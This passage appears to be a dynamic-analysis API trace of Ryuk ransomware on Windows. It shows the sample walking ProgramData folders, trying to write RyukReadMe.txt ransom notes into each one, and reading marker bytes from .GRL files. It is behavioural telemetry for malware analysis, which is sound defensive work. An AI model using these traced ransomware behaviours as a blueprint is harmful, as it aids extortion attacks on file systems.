hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.566] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.566] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.566] SetLastError (dwErrCode=0x0) [0159.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.566] GetLastError () returned 0xb7 [0159.566] CloseHandle (hObject=0x18c) returned 1 [0159.566] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.566] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.566] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.566] SetLastError (dwErrCode=0x0) [0159.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.567] GetLastError () returned 0xb7 [0159.567] CloseHandle (hObject=0x188) returned 1 [0159.567] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.567] SetLastError (dwErrCode=0x0) [0159.567] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.567] GetLastError () returned 0x5 [0159.567] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.567] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.567] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.567] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.567] SetLastError (dwErrCode=0x0) [0159.567] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.567] GetLastError () returned 0x5 [0159.567] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.567] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.568] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.568] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.568] SetLastError (dwErrCode=0x0) [0159.568] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.568] GetLastError () returned 0x5 [0159.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.568] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.568] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.568] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.568] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.568] SetLastError (dwErrCode=0x0) [0159.568] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.568] GetLastError () returned 0x5 [0159.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.568] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.569] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.569] SetLastError (dwErrCode=0x0) [0159.569] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.569] GetLastError () returned 0x5 [0159.569] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.569] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.569] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.569] SetLastError (dwErrCode=0x0) [0159.569] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.569] GetLastError () returned 0x5 [0159.569] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.569] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.569] SetLastError (dwErrCode=0x0) [0159.569] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.569] GetLastError () returned 0x5 [0159.569] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.569] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.570] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.570] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.570] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.570] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.570] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.570] SetLastError (dwErrCode=0x0) [0159.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.570] GetLastError () returned 0x5 [0159.570] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.570] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.570] SetLastError (dwErrCode=0x0) [0159.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.570] GetLastError () returned 0x5 [0159.570] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.570] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Media Player\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.571] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.571] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.571] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.571] SetLastError (dwErrCode=0x0) [0159.571] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.571] GetLastError () returned 0x5 [0159.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.571] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.571] SetLastError (dwErrCode=0x0) [0159.571] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.571] GetLastError () returned 0x5 [0159.571] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.571] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.571] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.571] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.571] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.572] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x80) returned 1 [0159.572] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.572] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=15250) returned 1 [0159.572] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=15250) returned 1 [0159.572] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.572] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0159.573] CloseHandle (hObject=0x18c) returned 1 [0159.573] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.573] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.573] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x80) returned 1 [0159.573] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.574] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=15250) returned 1 [0159.574] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=15250) returned 1 [0159.574] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.574] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0159.574] CloseHandle (hObject=0x18c) returned 1 [0159.574] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.575] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.575] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.575] SetLastError (dwErrCode=0x0) [0159.575] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\mf\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.575] GetLastError () returned 0x5 [0159.575] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.575] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.575] SetLastError (dwErrCode=0x0) [0159.575] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.575] GetLastError () returned 0x5 [0159.575] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.575] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.575] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.575] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.575] SetLastError (dwErrCode=0x0) [0159.575] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.576] GetLastError () returned 0x5 [0159.576] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.576] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.576] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.576] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.576] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.576] SetLastError (dwErrCode=0x0) [0159.576] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\8.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.576] GetLastError () returned 0x5 [0159.576] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.576] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.576] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.576] SetLastError (dwErrCode=0x0) [0159.576] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.577] GetLastError () returned 0x5 [0159.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.577] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.577] SetLastError (dwErrCode=0x0) [0159.577] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.577] GetLastError () returned 0x5 [0159.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.577] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.577] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.577] SetLastError (dwErrCode=0x0) [0159.577] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.577] GetLastError () returned 0x5 [0159.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.577] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.577] SetLastError (dwErrCode=0x0) [0159.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.578] GetLastError () returned 0x5 [0159.578] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.578] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.578] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.578] SetLastError (dwErrCode=0x0) [0159.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.578] GetLastError () returned 0x5 [0159.578] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.578] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.578] SetLastError (dwErrCode=0x0) [0159.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.578] GetLastError () returned 0x5 [0159.578] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.579] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.579] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.579] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.579] SetLastError (dwErrCode=0x0) [0159.579] 